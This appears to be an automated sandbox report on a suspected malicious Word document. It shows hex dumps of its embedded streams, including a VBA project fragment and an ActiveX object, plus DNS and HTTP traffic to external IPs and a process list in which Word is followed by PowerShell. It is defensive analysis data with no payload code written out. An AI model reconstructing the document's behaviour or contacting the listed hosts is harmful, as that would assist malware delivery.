Data ASCII: | . H . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . l . . . . . . . . ! _ . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ s y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t o m a t i o n . ` . . . E N o r m a l . E N C r . m . a Q F . . . . . * , \\ C . . . . . m . . A ! O f f i c g O D . f . i . c g . |
Data Raw: | 01 48 b4 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 eb 21 e1 5f 14 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30 |
General | |
Stream Path: | ObjectPool/_1638126958/\x3OCXNAME |
File Type: | data |
Stream Size: | 22 |
Entropy: | 2.272808148826652 |
Base64 Encoded: | False |
Data ASCII: | L . x . i . j . u . p . n . g . v . . . . . |
Data Raw: | 4c 00 78 00 69 00 6a 00 75 00 70 00 6e 00 67 00 76 00 00 00 00 00 |
General | |
Stream Path: | ObjectPool/_1638126958/contents |
File Type: | data |
Stream Size: | 64 |
Entropy: | 3.000394047763189 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . @ . . . . . H , . . . . . . . . . . . P . . . . . . . 7 . . . . . . . . @ . . . . . . . C a l i b r i . |
Data Raw: | 00 02 1c 00 01 01 40 80 00 00 00 00 1d 48 80 2c 01 00 00 80 1a 00 00 00 1a 00 00 00 50 00 00 00 00 02 1c 00 37 00 00 00 07 00 00 80 00 20 00 40 e1 00 00 00 00 02 00 00 43 61 6c 69 62 72 69 00 |
General | |
Stream Path: | WordDocument |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 1.3697220539987924 |
Base64 Encoded: | False |
Data ASCII: | . s . . . . . . . . . . . . . . . . . . . . . ' . . . . . b j b j 2 ) 2 ) . . . . . . . . . . . . . . . . . . . . . . . . . . P C f P C f ' . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . B . . . . . . . B . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . t . . . . . . |
Data Raw: | ec a5 c1 00 73 00 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 27 08 00 00 0e 00 62 6a 62 6a 32 29 32 29 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e 0e 00 00 50 43 99 66 50 43 99 66 27 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Feb 7, 2023 18:14:14.719769955 CET | 49173 | 80 | 192.168.2.22 | 103.224.212.222 |
Feb 7, 2023 18:14:14.885829926 CET | 80 | 49173 | 103.224.212.222 | 192.168.2.22 |
Feb 7, 2023 18:14:14.886035919 CET | 49173 | 80 | 192.168.2.22 | 103.224.212.222 |
Feb 7, 2023 18:14:14.895281076 CET | 49173 | 80 | 192.168.2.22 | 103.224.212.222 |
Feb 7, 2023 18:14:15.102181911 CET | 80 | 49173 | 103.224.212.222 | 192.168.2.22 |
Feb 7, 2023 18:14:15.119752884 CET | 80 | 49173 | 103.224.212.222 | 192.168.2.22 |
Feb 7, 2023 18:14:15.119781971 CET | 80 | 49173 | 103.224.212.222 | 192.168.2.22 |
Feb 7, 2023 18:14:15.119842052 CET | 49173 | 80 | 192.168.2.22 | 103.224.212.222 |
Feb 7, 2023 18:14:15.120667934 CET | 49173 | 80 | 192.168.2.22 | 103.224.212.222 |
Feb 7, 2023 18:14:15.285584927 CET | 80 | 49173 | 103.224.212.222 | 192.168.2.22 |
Feb 7, 2023 18:14:15.304344893 CET | 49174 | 80 | 192.168.2.22 | 13.248.148.254 |
Feb 7, 2023 18:14:15.324196100 CET | 80 | 49174 | 13.248.148.254 | 192.168.2.22 |
Feb 7, 2023 18:14:15.324350119 CET | 49174 | 80 | 192.168.2.22 | 13.248.148.254 |
Feb 7, 2023 18:14:15.324487925 CET | 49174 | 80 | 192.168.2.22 | 13.248.148.254 |
Feb 7, 2023 18:14:15.344772100 CET | 80 | 49174 | 13.248.148.254 | 192.168.2.22 |
Feb 7, 2023 18:14:15.466506958 CET | 80 | 49174 | 13.248.148.254 | 192.168.2.22 |
Feb 7, 2023 18:14:15.560751915 CET | 49175 | 80 | 192.168.2.22 | 162.212.129.161 |
Feb 7, 2023 18:14:15.672749996 CET | 80 | 49174 | 13.248.148.254 | 192.168.2.22 |
Feb 7, 2023 18:14:15.672928095 CET | 49174 | 80 | 192.168.2.22 | 13.248.148.254 |
Feb 7, 2023 18:14:15.686521053 CET | 80 | 49175 | 162.212.129.161 | 192.168.2.22 |
Feb 7, 2023 18:14:15.686666012 CET | 49175 | 80 | 192.168.2.22 | 162.212.129.161 |
Feb 7, 2023 18:14:15.686811924 CET | 49175 | 80 | 192.168.2.22 | 162.212.129.161 |
Feb 7, 2023 18:14:15.812516928 CET | 80 | 49175 | 162.212.129.161 | 192.168.2.22 |
Feb 7, 2023 18:14:15.816334009 CET | 80 | 49175 | 162.212.129.161 | 192.168.2.22 |
Feb 7, 2023 18:14:15.906567097 CET | 49175 | 80 | 192.168.2.22 | 162.212.129.161 |
Feb 7, 2023 18:14:15.906641006 CET | 49174 | 80 | 192.168.2.22 | 13.248.148.254 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Feb 7, 2023 18:14:12.096406937 CET | 55868 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 7, 2023 18:14:12.119050980 CET | 53 | 55868 | 8.8.8.8 | 192.168.2.22 |
Feb 7, 2023 18:14:12.196402073 CET | 49688 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 7, 2023 18:14:12.238814116 CET | 53 | 49688 | 8.8.8.8 | 192.168.2.22 |
Feb 7, 2023 18:14:12.240439892 CET | 137 | 137 | 192.168.2.22 | 192.168.2.255 |
Feb 7, 2023 18:14:12.998070955 CET | 137 | 137 | 192.168.2.22 | 192.168.2.255 |
Feb 7, 2023 18:14:13.762510061 CET | 137 | 137 | 192.168.2.22 | 192.168.2.255 |
Feb 7, 2023 18:14:14.536828995 CET | 58836 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 7, 2023 18:14:14.708704948 CET | 53 | 58836 | 8.8.8.8 | 192.168.2.22 |
Feb 7, 2023 18:14:15.125154018 CET | 50134 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 7, 2023 18:14:15.303457975 CET | 53 | 50134 | 8.8.8.8 | 192.168.2.22 |
Feb 7, 2023 18:14:15.476758957 CET | 55275 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 7, 2023 18:14:15.555291891 CET | 53 | 55275 | 8.8.8.8 | 192.168.2.22 |
Feb 7, 2023 18:14:15.821939945 CET | 59915 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 7, 2023 18:14:15.843313932 CET | 53 | 59915 | 8.8.8.8 | 192.168.2.22 |
Feb 7, 2023 18:14:35.652678967 CET | 138 | 138 | 192.168.2.22 | 192.168.2.255 |
Feb 7, 2023 18:16:05.690131903 CET | 138 | 138 | 192.168.2.22 | 192.168.2.255 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Feb 7, 2023 18:14:12.096406937 CET | 192.168.2.22 | 8.8.8.8 | 0x66b2 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Feb 7, 2023 18:14:12.196402073 CET | 192.168.2.22 | 8.8.8.8 | 0xc630 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Feb 7, 2023 18:14:14.536828995 CET | 192.168.2.22 | 8.8.8.8 | 0xe5a1 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Feb 7, 2023 18:14:15.125154018 CET | 192.168.2.22 | 8.8.8.8 | 0x299d | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Feb 7, 2023 18:14:15.476758957 CET | 192.168.2.22 | 8.8.8.8 | 0x8deb | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Feb 7, 2023 18:14:15.821939945 CET | 192.168.2.22 | 8.8.8.8 | 0xdcc8 | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Feb 7, 2023 18:14:12.119050980 CET | 8.8.8.8 | 192.168.2.22 | 0x66b2 | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
Feb 7, 2023 18:14:12.238814116 CET | 8.8.8.8 | 192.168.2.22 | 0xc630 | Server failure (2) | none | none | A (IP address) | IN (0x0001) | false | |
Feb 7, 2023 18:14:14.708704948 CET | 8.8.8.8 | 192.168.2.22 | 0xe5a1 | No error (0) | 103.224.212.222 | A (IP address) | IN (0x0001) | false | ||
Feb 7, 2023 18:14:15.303457975 CET | 8.8.8.8 | 192.168.2.22 | 0x299d | No error (0) | 701602.parkingcrew.net | CNAME (Canonical name) | IN (0x0001) | false | ||
Feb 7, 2023 18:14:15.303457975 CET | 8.8.8.8 | 192.168.2.22 | 0x299d | No error (0) | 13.248.148.254 | A (IP address) | IN (0x0001) | false | ||
Feb 7, 2023 18:14:15.303457975 CET | 8.8.8.8 | 192.168.2.22 | 0x299d | No error (0) | 76.223.26.96 | A (IP address) | IN (0x0001) | false | ||
Feb 7, 2023 18:14:15.555291891 CET | 8.8.8.8 | 192.168.2.22 | 0x8deb | No error (0) | 162.212.129.161 | A (IP address) | IN (0x0001) | false | ||
Feb 7, 2023 18:14:15.843313932 CET | 8.8.8.8 | 192.168.2.22 | 0xdcc8 | Name error (3) | none | none | A (IP address) | IN (0x0001) | false |
|
Click to jump to process
Target ID: | 0 |
Start time: | 18:13:18 |
Start date: | 07/02/2023 |
Path: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f060000 |
File size: | 1423704 bytes |
MD5 hash: | 9EE74859D22DAE61F1750B3A1BACB6F5 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Target ID: | 5 |
Start time: | 18:13:25 |
Start date: | 07/02/2023 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f5e0000 |
File size: | 473600 bytes |
MD5 hash: | 852D67A27E454BD389FA7F02A8CBE23F |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | .Net C# or VB.NET |
Reputation: | high |